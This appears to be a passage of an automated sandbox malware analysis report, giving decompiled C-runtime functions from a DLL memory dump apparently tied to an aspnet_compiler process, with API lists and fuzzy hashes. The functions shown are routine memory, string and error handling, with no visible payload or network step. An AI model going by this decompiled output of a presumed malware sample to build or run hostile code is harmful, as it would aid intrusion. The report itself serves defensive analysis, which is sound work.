                                                                                                                                                                                                                                                                  					FreeEnvironmentStringsW(_t27);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t13;
                                                                                                                                                                                                                                                                  			}












                                                                                                                                                                                                                                                                  0x10007162
                                                                                                                                                                                                                                                                  0x10007168
                                                                                                                                                                                                                                                                  0x100071c0
                                                                                                                                                                                                                                                                  0x100071c0
                                                                                                                                                                                                                                                                  0x1000716a
                                                                                                                                                                                                                                                                  0x1000716b
                                                                                                                                                                                                                                                                  0x10007170
                                                                                                                                                                                                                                                                  0x10007179
                                                                                                                                                                                                                                                                  0x1000717f
                                                                                                                                                                                                                                                                  0x10007185
                                                                                                                                                                                                                                                                  0x1000718a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x1000718c
                                                                                                                                                                                                                                                                  0x10007192
                                                                                                                                                                                                                                                                  0x10007197
                                                                                                                                                                                                                                                                  0x100071b5
                                                                                                                                                                                                                                                                  0x100071af
                                                                                                                                                                                                                                                                  0x100071af
                                                                                                                                                                                                                                                                  0x100071b1
                                                                                                                                                                                                                                                                  0x100071b1
                                                                                                                                                                                                                                                                  0x100071b8
                                                                                                                                                                                                                                                                  0x100071bd
                                                                                                                                                                                                                                                                  0x1000718a
                                                                                                                                                                                                                                                                  0x100071c4
                                                                                                                                                                                                                                                                  0x100071c7
                                                                                                                                                                                                                                                                  0x100071c7
                                                                                                                                                                                                                                                                  0x100071d5

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                                                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 100071B8
                                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                                                                                                                                                  • Opcode ID: 538e005ec5e07aa0025c8ab2c965a1477625c834b139277c4c1cc74c528b1f6e
                                                                                                                                                                                                                                                                  • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 538e005ec5e07aa0025c8ab2c965a1477625c834b139277c4c1cc74c528b1f6e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                                                                                                                  			E10005B7A(void* __ecx) {
                                                                                                                                                                                                                                                                  				void* __esi;
                                                                                                                                                                                                                                                                  				intOrPtr _t2;
                                                                                                                                                                                                                                                                  				void* _t4;
                                                                                                                                                                                                                                                                  				void* _t10;
                                                                                                                                                                                                                                                                  				void* _t11;
                                                                                                                                                                                                                                                                  				void* _t13;
                                                                                                                                                                                                                                                                  				void* _t15;
                                                                                                                                                                                                                                                                  				long _t16;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t11 = __ecx;
                                                                                                                                                                                                                                                                  				_t16 = GetLastError();
                                                                                                                                                                                                                                                                  				_t10 = 0;
                                                                                                                                                                                                                                                                  				_t2 =  *0x10013044; // 0x9
                                                                                                                                                                                                                                                                  				_t19 = _t2 - 0xffffffff;
                                                                                                                                                                                                                                                                  				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                                                                                  					L2:
                                                                                                                                                                                                                                                                  					_t15 = E1000637B(_t11, 1, 0x364);
                                                                                                                                                                                                                                                                  					_pop(_t13);
                                                                                                                                                                                                                                                                  					if(_t15 != 0) {
                                                                                                                                                                                                                                                                  						_t4 = E10005E5E(_t13, _t16, __eflags,  *0x10013044, _t15);
                                                                                                                                                                                                                                                                  						__eflags = _t4;
                                                                                                                                                                                                                                                                  						if(_t4 != 0) {
                                                                                                                                                                                                                                                                  							E1000593C(_t13, _t15, 0x100141b0);
                                                                                                                                                                                                                                                                  							E1000571E(_t10);
                                                                                                                                                                                                                                                                  							__eflags = _t15;
                                                                                                                                                                                                                                                                  							if(_t15 != 0) {
                                                                                                                                                                                                                                                                  								goto L9;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								goto L8;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_push(_t15);
                                                                                                                                                                                                                                                                  							goto L4;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						_push(_t10);
                                                                                                                                                                                                                                                                  						L4:
                                                                                                                                                                                                                                                                  						E1000571E();
                                                                                                                                                                                                                                                                  						L8:
                                                                                                                                                                                                                                                                  						SetLastError(_t16);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t15 = E10005E08(_t11, _t16, _t19, _t2);
                                                                                                                                                                                                                                                                  					if(_t15 != 0) {
                                                                                                                                                                                                                                                                  						L9:
                                                                                                                                                                                                                                                                  						SetLastError(_t16);
                                                                                                                                                                                                                                                                  						_t10 = _t15;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						goto L2;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t10;
                                                                                                                                                                                                                                                                  			}











                                                                                                                                                                                                                                                                  0x10005b7a
                                                                                                                                                                                                                                                                  0x10005b85
                                                                                                                                                                                                                                                                  0x10005b87
                                                                                                                                                                                                                                                                  0x10005b89
                                                                                                                                                                                                                                                                  0x10005b8e
                                                                                                                                                                                                                                                                  0x10005b91
                                                                                                                                                                                                                                                                  0x10005b9f
                                                                                                                                                                                                                                                                  0x10005bab
                                                                                                                                                                                                                                                                  0x10005bae
                                                                                                                                                                                                                                                                  0x10005bb1
                                                                                                                                                                                                                                                                  0x10005bc3
                                                                                                                                                                                                                                                                  0x10005bc8
                                                                                                                                                                                                                                                                  0x10005bca
                                                                                                                                                                                                                                                                  0x10005bd5
                                                                                                                                                                                                                                                                  0x10005bdb
                                                                                                                                                                                                                                                                  0x10005be3
                                                                                                                                                                                                                                                                  0x10005be5
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10005bcc
                                                                                                                                                                                                                                                                  0x10005bcc
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10005bcc
                                                                                                                                                                                                                                                                  0x10005bb3
                                                                                                                                                                                                                                                                  0x10005bb3
                                                                                                                                                                                                                                                                  0x10005bb4
                                                                                                                                                                                                                                                                  0x10005bb4
                                                                                                                                                                                                                                                                  0x10005be7
                                                                                                                                                                                                                                                                  0x10005be8
                                                                                                                                                                                                                                                                  0x10005be8
                                                                                                                                                                                                                                                                  0x10005b93
                                                                                                                                                                                                                                                                  0x10005b99
                                                                                                                                                                                                                                                                  0x10005b9d
                                                                                                                                                                                                                                                                  0x10005bf0
                                                                                                                                                                                                                                                                  0x10005bf1
                                                                                                                                                                                                                                                                  0x10005bf7
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10005b9d
                                                                                                                                                                                                                                                                  0x10005bfe

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10005BB4
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10005BDB
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                  • Opcode ID: a43bbd9dedad492b4867495e73305fe18bc43595393de5a5f7df452d672767c8
                                                                                                                                                                                                                                                                  • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a43bbd9dedad492b4867495e73305fe18bc43595393de5a5f7df452d672767c8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E10001E89(WCHAR* __ecx, WCHAR* __edx, WCHAR* _a4) {
                                                                                                                                                                                                                                                                  				void* __edi;
                                                                                                                                                                                                                                                                  				signed int _t11;
                                                                                                                                                                                                                                                                  				signed int _t13;
                                                                                                                                                                                                                                                                  				void* _t16;
                                                                                                                                                                                                                                                                  				short _t17;
                                                                                                                                                                                                                                                                  				WCHAR* _t19;
                                                                                                                                                                                                                                                                  				WCHAR* _t20;
                                                                                                                                                                                                                                                                  				WCHAR* _t21;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t19 = __ecx;
                                                                                                                                                                                                                                                                  				_t20 = __edx;
                                                                                                                                                                                                                                                                  				E10002C40(_t19, _t19, 0, lstrlenW(__ecx) + _t7);
                                                                                                                                                                                                                                                                  				lstrcatW(_t19, _t20);
                                                                                                                                                                                                                                                                  				_t11 = lstrlenW(_t19);
                                                                                                                                                                                                                                                                  				_t21 = _a4;
                                                                                                                                                                                                                                                                  				_t16 = 0x5c;
                                                                                                                                                                                                                                                                  				if( *((intOrPtr*)(_t19 + _t11 * 2 - 2)) != _t16 &&  *_t21 != _t16) {
                                                                                                                                                                                                                                                                  					_t13 = lstrlenW(_t19);
                                                                                                                                                                                                                                                                  					_t17 = 0x5c;
                                                                                                                                                                                                                                                                  					_t19[_t13] = _t17;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return lstrcatW(_t19, _t21);
                                                                                                                                                                                                                                                                  			}











                                                                                                                                                                                                                                                                  0x10001e95
                                                                                                                                                                                                                                                                  0x10001e97
                                                                                                                                                                                                                                                                  0x10001ea2
                                                                                                                                                                                                                                                                  0x10001eac
                                                                                                                                                                                                                                                                  0x10001eb3
                                                                                                                                                                                                                                                                  0x10001eb5
                                                                                                                                                                                                                                                                  0x10001eba
                                                                                                                                                                                                                                                                  0x10001ec0
                                                                                                                                                                                                                                                                  0x10001ec8
                                                                                                                                                                                                                                                                  0x10001ecc
                                                                                                                                                                                                                                                                  0x10001ecd
                                                                                                                                                                                                                                                                  0x10001ecd
                                                                                                                                                                                                                                                                  0x10001edd

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 493641738-0
                                                                                                                                                                                                                                                                  • Opcode ID: 86a5e3eccfa0b10d32d5ccd771a1d407c0b091fd4772acad1de5eb86745ccb0d
                                                                                                                                                                                                                                                                  • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86a5e3eccfa0b10d32d5ccd771a1d407c0b091fd4772acad1de5eb86745ccb0d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                                                                                                                  			E10005351(signed int __ecx) {
                                                                                                                                                                                                                                                                  				intOrPtr _t7;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                                  				if((__ecx | 0xffffffff) == 0) {
                                                                                                                                                                                                                                                                  					_t7 =  *0x10013570; // 0x3e509e0
                                                                                                                                                                                                                                                                  					if(_t7 != 0x10013350) {
                                                                                                                                                                                                                                                                  						E1000571E(_t7);
                                                                                                                                                                                                                                                                  						 *0x10013570 = 0x10013350;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				E1000571E( *0x100141b4);
                                                                                                                                                                                                                                                                  				 *0x100141b4 = 0;
                                                                                                                                                                                                                                                                  				E1000571E( *0x100141b8);
                                                                                                                                                                                                                                                                  				 *0x100141b8 = 0;
                                                                                                                                                                                                                                                                  				E1000571E( *0x10013f7c);
                                                                                                                                                                                                                                                                  				 *0x10013f7c = 0;
                                                                                                                                                                                                                                                                  				E1000571E( *0x10013f80);
                                                                                                                                                                                                                                                                  				 *0x10013f80 = 0;
                                                                                                                                                                                                                                                                  				return 1;
                                                                                                                                                                                                                                                                  			}




                                                                                                                                                                                                                                                                  0x1000535a
                                                                                                                                                                                                                                                                  0x1000535e
                                                                                                                                                                                                                                                                  0x10005360
                                                                                                                                                                                                                                                                  0x1000536c
                                                                                                                                                                                                                                                                  0x1000536f
                                                                                                                                                                                                                                                                  0x10005375
                                                                                                                                                                                                                                                                  0x10005375
                                                                                                                                                                                                                                                                  0x1000536c
                                                                                                                                                                                                                                                                  0x10005381
                                                                                                                                                                                                                                                                  0x1000538e
                                                                                                                                                                                                                                                                  0x10005394
                                                                                                                                                                                                                                                                  0x1000539f
                                                                                                                                                                                                                                                                  0x100053a5
                                                                                                                                                                                                                                                                  0x100053b0
                                                                                                                                                                                                                                                                  0x100053b6
                                                                                                                                                                                                                                                                  0x100053be
                                                                                                                                                                                                                                                                  0x100053c7

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1000536F
                                                                                                                                                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,10007E60,?,?,10007D9E,?,00000000,?,00000000,00000000,?,10005AB5,00000000,00000000), ref: 10005734
                                                                                                                                                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,10007E60,?,?,10007D9E,?,00000000,?,00000000,00000000,?,10005AB5,00000000,00000000), ref: 10005746
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10005381
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10005394
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 100053A5
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 100053B6
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                  • Opcode ID: a2b9d1bd2fa0a99f311e731b28a8459724dbbe9800567044fe24ad73ce84600b
                                                                                                                                                                                                                                                                  • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2b9d1bd2fa0a99f311e731b28a8459724dbbe9800567044fe24ad73ce84600b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                                                                                                                                  			E10004BDD(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                                                                                                                  				void* _v12;
                                                                                                                                                                                                                                                                  				char _v16;
                                                                                                                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                                                                                                                  				void* __edi;
                                                                                                                                                                                                                                                                  				void* __esi;
                                                                                                                                                                                                                                                                  				intOrPtr* _t36;
                                                                                                                                                                                                                                                                  				struct HINSTANCE__* _t37;
                                                                                                                                                                                                                                                                  				struct HINSTANCE__* _t43;
                                                                                                                                                                                                                                                                  				intOrPtr* _t44;
                                                                                                                                                                                                                                                                  				intOrPtr* _t45;
                                                                                                                                                                                                                                                                  				CHAR* _t49;
                                                                                                                                                                                                                                                                  				struct HINSTANCE__* _t50;
                                                                                                                                                                                                                                                                  				void* _t52;
                                                                                                                                                                                                                                                                  				struct HINSTANCE__* _t55;
                                                                                                                                                                                                                                                                  				intOrPtr* _t59;
                                                                                                                                                                                                                                                                  				struct HINSTANCE__* _t64;
                                                                                                                                                                                                                                                                  				intOrPtr _t65;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t52 = __ecx;
                                                                                                                                                                                                                                                                  				if(_a4 == 2 || _a4 == 1) {
                                                                                                                                                                                                                                                                  					E10006D60(_t52);
                                                                                                                                                                                                                                                                  					GetModuleFileNameA(0, 0x10013c10, 0x104);
                                                                                                                                                                                                                                                                  					_t49 =  *0x10013f84; // 0x13034a0
                                                                                                                                                                                                                                                                  					 *0x10013f8c = 0x10013c10;
                                                                                                                                                                                                                                                                  					if(_t49 == 0 ||  *_t49 == 0) {
                                                                                                                                                                                                                                                                  						_t49 = 0x10013c10;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v8 = 0;
                                                                                                                                                                                                                                                                  					_v16 = 0;
                                                                                                                                                                                                                                                                  					E10004D01(_t52, _t49, 0, 0,  &_v8,  &_v16);
                                                                                                                                                                                                                                                                  					_t64 = E10004E76(_v8, _v16, 1);
                                                                                                                                                                                                                                                                  					if(_t64 != 0) {
                                                                                                                                                                                                                                                                  						E10004D01(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                                                                                                                                                                                                                                                                  						if(_a4 != 1) {
                                                                                                                                                                                                                                                                  							_v12 = 0;
                                                                                                                                                                                                                                                                  							_push( &_v12);
                                                                                                                                                                                                                                                                  							_t50 = E1000687B(_t49, 0, _t64, _t64);
                                                                                                                                                                                                                                                                  							if(_t50 == 0) {
                                                                                                                                                                                                                                                                  								_t59 = _v12;
                                                                                                                                                                                                                                                                  								_t55 = 0;
                                                                                                                                                                                                                                                                  								_t36 = _t59;
                                                                                                                                                                                                                                                                  								if( *_t59 == 0) {
                                                                                                                                                                                                                                                                  									L15:
                                                                                                                                                                                                                                                                  									_t37 = 0;
                                                                                                                                                                                                                                                                  									 *0x10013f78 = _t55;
                                                                                                                                                                                                                                                                  									_v12 = 0;
                                                                                                                                                                                                                                                                  									_t50 = 0;
                                                                                                                                                                                                                                                                  									 *0x10013f7c = _t59;
                                                                                                                                                                                                                                                                  									L16:
                                                                                                                                                                                                                                                                  									E1000571E(_t37);
                                                                                                                                                                                                                                                                  									_v12 = 0;
                                                                                                                                                                                                                                                                  									goto L17;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									goto L14;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								do {
                                                                                                                                                                                                                                                                  									L14:
                                                                                                                                                                                                                                                                  									_t36 = _t36 + 4;
                                                                                                                                                                                                                                                                  									_t55 =  &(_t55->i);
                                                                                                                                                                                                                                                                  								} while ( *_t36 != 0);
                                                                                                                                                                                                                                                                  								goto L15;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t37 = _v12;
                                                                                                                                                                                                                                                                  							goto L16;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						 *0x10013f78 = _v8 - 1;
                                                                                                                                                                                                                                                                  						_t43 = _t64;
                                                                                                                                                                                                                                                                  						_t64 = 0;
                                                                                                                                                                                                                                                                  						 *0x10013f7c = _t43;
                                                                                                                                                                                                                                                                  						goto L10;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						_t44 = E10006368();
                                                                                                                                                                                                                                                                  						_push(0xc);
                                                                                                                                                                                                                                                                  						_pop(0);
                                                                                                                                                                                                                                                                  						 *_t44 = 0;
                                                                                                                                                                                                                                                                  						L10:
                                                                                                                                                                                                                                                                  						_t50 = 0;
                                                                                                                                                                                                                                                                  						L17:
                                                                                                                                                                                                                                                                  						E1000571E(_t64);
                                                                                                                                                                                                                                                                  						return _t50;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t45 = E10006368();
                                                                                                                                                                                                                                                                  					_t65 = 0x16;
                                                                                                                                                                                                                                                                  					 *_t45 = _t65;
                                                                                                                                                                                                                                                                  					E100062AC();
                                                                                                                                                                                                                                                                  					return _t65;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}





















                                                                                                                                                                                                                                                                  0x10004bdd
                                                                                                                                                                                                                                                                  0x10004bea
                                                                                                                                                                                                                                                                  0x10004c0a
                                                                                                                                                                                                                                                                  0x10004c1d
                                                                                                                                                                                                                                                                  0x10004c23
                                                                                                                                                                                                                                                                  0x10004c29
                                                                                                                                                                                                                                                                  0x10004c31
                                                                                                                                                                                                                                                                  0x10004c38
                                                                                                                                                                                                                                                                  0x10004c38
                                                                                                                                                                                                                                                                  0x10004c3d
                                                                                                                                                                                                                                                                  0x10004c44
                                                                                                                                                                                                                                                                  0x10004c4b
                                                                                                                                                                                                                                                                  0x10004c5d
                                                                                                                                                                                                                                                                  0x10004c64
                                                                                                                                                                                                                                                                  0x10004c83
                                                                                                                                                                                                                                                                  0x10004c8f
                                                                                                                                                                                                                                                                  0x10004caa
                                                                                                                                                                                                                                                                  0x10004cad
                                                                                                                                                                                                                                                                  0x10004cb4
                                                                                                                                                                                                                                                                  0x10004cba
                                                                                                                                                                                                                                                                  0x10004cc1
                                                                                                                                                                                                                                                                  0x10004cc4
                                                                                                                                                                                                                                                                  0x10004cc6
                                                                                                                                                                                                                                                                  0x10004cca
                                                                                                                                                                                                                                                                  0x10004cd4
                                                                                                                                                                                                                                                                  0x10004cd4
                                                                                                                                                                                                                                                                  0x10004cd6
                                                                                                                                                                                                                                                                  0x10004cdc
                                                                                                                                                                                                                                                                  0x10004cdf
                                                                                                                                                                                                                                                                  0x10004ce1
                                                                                                                                                                                                                                                                  0x10004ce7
                                                                                                                                                                                                                                                                  0x10004ce8
                                                                                                                                                                                                                                                                  0x10004cee
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10004ccc
                                                                                                                                                                                                                                                                  0x10004ccc
                                                                                                                                                                                                                                                                  0x10004ccc
                                                                                                                                                                                                                                                                  0x10004ccf
                                                                                                                                                                                                                                                                  0x10004cd0
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10004ccc
                                                                                                                                                                                                                                                                  0x10004cbc
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10004cbc
                                                                                                                                                                                                                                                                  0x10004c95
                                                                                                                                                                                                                                                                  0x10004c9a
                                                                                                                                                                                                                                                                  0x10004c9c
                                                                                                                                                                                                                                                                  0x10004c9e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10004c66
                                                                                                                                                                                                                                                                  0x10004c66
                                                                                                                                                                                                                                                                  0x10004c6b
                                                                                                                                                                                                                                                                  0x10004c6d
                                                                                                                                                                                                                                                                  0x10004c6e
                                                                                                                                                                                                                                                                  0x10004ca3
                                                                                                                                                                                                                                                                  0x10004ca3
                                                                                                                                                                                                                                                                  0x10004cf1
                                                                                                                                                                                                                                                                  0x10004cf2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10004cfb
                                                                                                                                                                                                                                                                  0x10004bf2
                                                                                                                                                                                                                                                                  0x10004bf2
                                                                                                                                                                                                                                                                  0x10004bf9
                                                                                                                                                                                                                                                                  0x10004bfa
                                                                                                                                                                                                                                                                  0x10004bfc
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10004c01

                                                                                                                                                                                                                                                                  APIs
